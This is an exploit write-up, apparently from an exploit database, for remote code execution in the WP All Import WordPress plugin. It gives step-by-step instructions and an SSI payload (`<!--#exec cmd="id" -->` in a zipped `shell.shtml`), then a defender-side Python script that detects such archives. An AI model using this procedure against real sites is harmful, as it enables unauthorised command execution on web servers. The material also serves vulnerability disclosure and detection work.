## https://sploitus.com/exploit?id=WPEX-ID:7F947305-7A72-4C59-9AE8-193F437FD04E
1. Configure the Apache server with mod_include and mod_cgi enabled, and enable server-side includes:

      Options Includes
      AddType text/html .shtml
      AddOutputFilter INCLUDES .shtml

2. Create a zip file including a CSV file and a file `shell.shtml` with the following contents:

      <!--#exec cmd="id" -->

3. As a site administrator on a multisite instance, visit `/wp-admin/admin.php?page=pmxi-admin-import`.

4. Click "Upload a file" and choose the zip file created previously.

5. View the response of the AJAX request to `/wp-admin/admin.php?page=pmxi-admin-settings&action=upload&_wpnonce=...` to find the directory of the uploaded zip file.

6. Directly access `shell.shtml` (e.g. at `https://example.com/wp-content/uploads/wpallimport/uploads/abc123/zipfilename/shell.shtml`) to trigger the RCE.
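A defender-side check for the archive layout in step 2, added here as an example and not part of the original advisory or the plugin's code: it audits an import zip before extraction and flags members that fall outside a data-file allowlist or carry SSI directives. The function names and the `EXPECTED_EXTENSIONS` allowlist are assumptions made for this example, and the sample archive is constructed inline.

```python
import io
import posixpath
import re
import zipfile

# SSI directives that execute commands or pull in other content.
SSI_DIRECTIVE = re.compile(rb"<!--#(exec|include)\b", re.IGNORECASE)
# Extensions an import archive is expected to carry (assumption for this example).
EXPECTED_EXTENSIONS = {".csv", ".xml", ".json", ".txt"}
# Bounded read so one oversized member cannot exhaust memory.
MAX_SCAN_BYTES = 1024 * 1024


def audit_import_zip(data: bytes) -> list:
    """Return (member name, reason) for each suspicious member of a zip archive."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            name = info.filename
            ext = posixpath.splitext(name)[1].lower()
            if ext not in EXPECTED_EXTENSIONS:
                findings.append((name, f"unexpected extension {ext or '(none)'}"))
            with archive.open(info) as member:
                head = member.read(MAX_SCAN_BYTES)
            if SSI_DIRECTIVE.search(head):
                findings.append((name, "contains SSI directive"))
    return findings


def build_sample_zip(include_shtml: bool = True) -> bytes:
    """Constructed sample mirroring the archive described in step 2."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("products.csv", "sku,name\n1,widget\n")
        if include_shtml:
            archive.writestr("shell.shtml", '<!--#exec cmd="id" -->')
    return buf.getvalue()


if __name__ == "__main__":
    for name, reason in audit_import_zip(build_sample_zip()):
        print(f"{name}: {reason}")
```

The same two checks can be run over files already extracted under the upload directory from step 6 to find leftovers from earlier imports.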